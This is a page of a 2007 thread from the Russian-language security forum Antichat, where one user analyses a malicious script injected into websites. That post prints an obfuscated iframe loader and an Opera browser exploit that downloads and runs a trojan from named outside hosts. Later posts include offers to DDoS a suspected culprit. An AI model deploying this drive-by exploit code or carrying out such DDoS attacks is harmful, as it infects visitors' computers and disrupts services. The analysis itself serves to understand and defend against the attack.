ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ОФФТОП_OLD > Болталка
Перезагрузить страницу Что было с форумом?
   
 
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 27.09.2007, 01:22
astrologer
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349

Репутация: 808


По умолчанию
Точно хек (учитывается браузер??):
Код:
<SCRIPT>function ubi(grS,Cey){ var jsw=new Date(), rKa= new Date(); rKa.setTime(jsw.getTime()+86400000); document.cookie = grS+"="+escape(Cey)+";expires="+rKa.toGMTString(); }var cog='s1fVsm';var rbq='1',CLD='update1.classictel.org';var tjM='/html/';if(document.cookie.indexOf(cog+'='+rbq) ==-1){var dlh=document.location.host;var avS= 'ht'+'tp:'+'//'+( dlh != ''?'':eCI()) + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')+'.'+eCI() +'.' + CLD+tjM;var GdK=document.createElement('iframe');GdK.setAttribute ('src', avS);GdK.height=1;GdK.width=2;GdK.frameBorder = 0; try{ document.body.appendChild ( GdK); ubi(cog, rbq );} catch(e) {document.write ('<html><body></body></html>'); document.body.appendChild ( GdK);ubi ( cog,rbq) ;} }function eCI(){ var zZS=24;var NTe="01234567890abcdef",EYy=""; for(Uzd=0; Uzd < zZS; Uzd++) EYy+= NTe.substr(Math.?oor(Math.random()*NTe.length),1,1); return EYy; }</SCRIPT>
Как видно, адрес - _http://update1.classictel.org/html/
По этому адресу происходит переадресация на _http://dodo32.org/505/Xp/, где находится следующее:
Код:
<script>  blank_iframe = document.createElement('iframe');  blank_iframe.src = 'about:blank';  blank_iframe.setAttribute('id', 'blank_iframe_window');  blank_iframe.setAttribute('style', 'display:none');  document.appendChild(blank_iframe);  blank_iframe_window.eval  	("config_iframe = document.createElement('iframe');\  	config_iframe.setAttribute('id', 'config_iframe_window');\  	config_iframe.src = 'opera:config';\  	document.appendChild(config_iframe);\  	app_iframe = document.createElement('script');\  	cache_iframe = document.createElement('iframe');\  	app_iframe.src = 'http://dodo32.org/505/Xp//file.php?q=o9';\  	app_iframe.onload = function ()\  	{\  		cache_iframe.src = 'opera:cache';\  		cache_iframe.onload = function ()\  		{\  			cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\  			var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\  			filename = cache.match(re);\  			config_iframe_window.eval\  			(\"\  			opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\  			app_link = document.createElement('a');\  			app_link.setAttribute('href', 'tn3270://nothing');\  			app_link.click();\  			setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\  			\");\  		};\  		document.appendChild(cache_iframe);\  	};\  	document.appendChild(app_iframe);");  </script>
Данный код, вероятно, должен сопоставить протоколу "tn3270:" приложение telnet.exe и скачать некий file.exe (Trojan-Downloader.Win32.Small.ert) отсюда: _http://dodo32.org/505/Xp//file.php?q=o9
 

  #12  
Старый 27.09.2007, 03:01
zl0y
Banned
Регистрация: 13.09.2006
Сообщений: 523
Провел на форуме:
2869410

Репутация: 925


Отправить сообщение для zl0y с помощью ICQ
По умолчанию
Да не эт гонзо гей,я даже знаю кого надо поддосить,чтобы успокоились.
 

  #13  
Старый 27.09.2007, 03:24
Underwit
Banned
Регистрация: 06.10.2006
Сообщений: 288
Провел на форуме:
2741921

Репутация: 469
По умолчанию
хорошо что я бухал.
Синька спасет мир)))
 

  #14  
Старый 27.09.2007, 11:19
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию
Цитата:
Сообщение от !_filin_!  
ждёмс видео...думаю захотят похвалится...
нечем там хвалиться...
 

  #15  
Старый 29.09.2007, 16:06
rijy
Постоянный
Регистрация: 25.09.2006
Сообщений: 451
Провел на форуме:
2639641

Репутация: 1573
По умолчанию
интересно узнать, что за бага используеться=\ и как от нее закрыться... сегодня у меня на форуме началась та же херня.. те же файлы, те же хосты..
Цитата:
я даже знаю кого надо поддосить,чтобы успокоились.
поделись соображениями..
 

  #16  
Старый 29.09.2007, 16:21
Krey
Участник форума
Регистрация: 08.09.2007
Сообщений: 106
Провел на форуме:
388343

Репутация: 0
По умолчанию
Цитата:
Сообщение от zl0y  
Да не эт гонзо гей,я даже знаю кого надо поддосить,чтобы успокоились.
Скажи кого.
Могу реализовать =)
гонзо это который с winet ?
 

  #17  
Старый 29.09.2007, 16:41
-Concord-
Постоянный
Регистрация: 16.06.2006
Сообщений: 334
Провел на форуме:
1732994

Репутация: 600
Отправить сообщение для -Concord- с помощью ICQ
По умолчанию
хек... из серии сплойтов с coco32 и bobo32?
 

  #18  
Старый 29.09.2007, 19:42
LoneWolf666
Постоянный
Регистрация: 09.12.2005
Сообщений: 377
Провел на форуме:
2046072

Репутация: 362
По умолчанию
хорошо я вчера лопатил.... спасся =
а трухекерам этим не помешало бы на пальцах объяснить что нехорошо в кибервойны играть
 
 
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Дневник хакера или как Разогнать Целерон V.I.P Болталка 1 29.05.2007 16:22
Правда о докторе Айболите Дрэгги Болталка 17 30.09.2006 13:34



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ